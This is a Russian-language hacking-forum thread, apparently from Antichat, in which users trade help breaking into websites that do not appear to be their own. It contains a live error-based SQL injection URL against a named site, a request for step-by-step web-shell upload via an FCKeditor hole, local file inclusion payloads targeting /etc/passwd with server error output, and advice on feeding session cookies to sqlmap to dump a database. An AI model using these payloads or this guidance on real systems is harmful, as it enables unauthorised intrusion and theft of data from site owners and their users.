ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.aquaprima.ru/article_show.php?art_id=199+or+1+group+by+concat%2 8%28select+version%28%29%29,0x00,floor%28rand%280% 29*2%29%29having+min%280%29+or+1--+

есть уязвимость FCK editor Arbitary File upload но когда открываю страницу на которой уязвимост там ничего нету. А Acunetix пишет что загрузил тестовый текст . Можете плз пошагово написать как залить шелл?

ссылку пошлите

Может вам эта тема поможет разобраться /threadnav314734-1-10-fckeditor.html

Здравствуйте.

Вроде локал инклуд но не могу проинклудить...

Запрос

&language=ru"

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/ru"/common.php) [user.include]: failed to open stream: No such file or directory

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/ru"/common.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

Language file ./language/ru"/common.php couldn't be opened.

language=ru../../../../../etc/passwd%00

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/passwd) [user.include]: failed to open stream: No such file or directory

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

Language file ./language/passwd/common.php couldn't be opened.

language=ru../../../../../etc/passwd////кучу слешей/////

чистая страниц

language=ru../../../etc/passwd/%00

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/) [user.include]: failed to open stream: Success

[phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')

Language file ./language//common.php couldn't be opened.

вывести не выходит не как...

помогите советом!

или тут не чего не зделаеш?

и еще вопрос -есть скуль инжект на сайте но надо авторизоваться чтобы его использовать .есть ли прога, скрипт которая логинится к сайту и потом дампит базу используя скуль инжект ? руками долго очень перебирать база большеватая)

ishenko

просто авторизируйся на сайте, залезь в настройки кукисов и посмотри, что там сайт установил.

потом используй их в SQLMAP параметр --cookie="тут через ; записываются куки"

теперь можешь крутить как авторизированный пользователь

спасибо!! работает.

а по другому вопросу не ответите пожалуйста локал инклуд или не чего не сделаеш?

Почитай ТУТ хорошая подробная статья.

есть уязвимый на скулю скрипт, типа такого

$login = $_GET['login'];

SELECT id, user_name FROM users WHERE user_login = '$login'

ковычки слешируются, как составить любой запрос на выборку данных?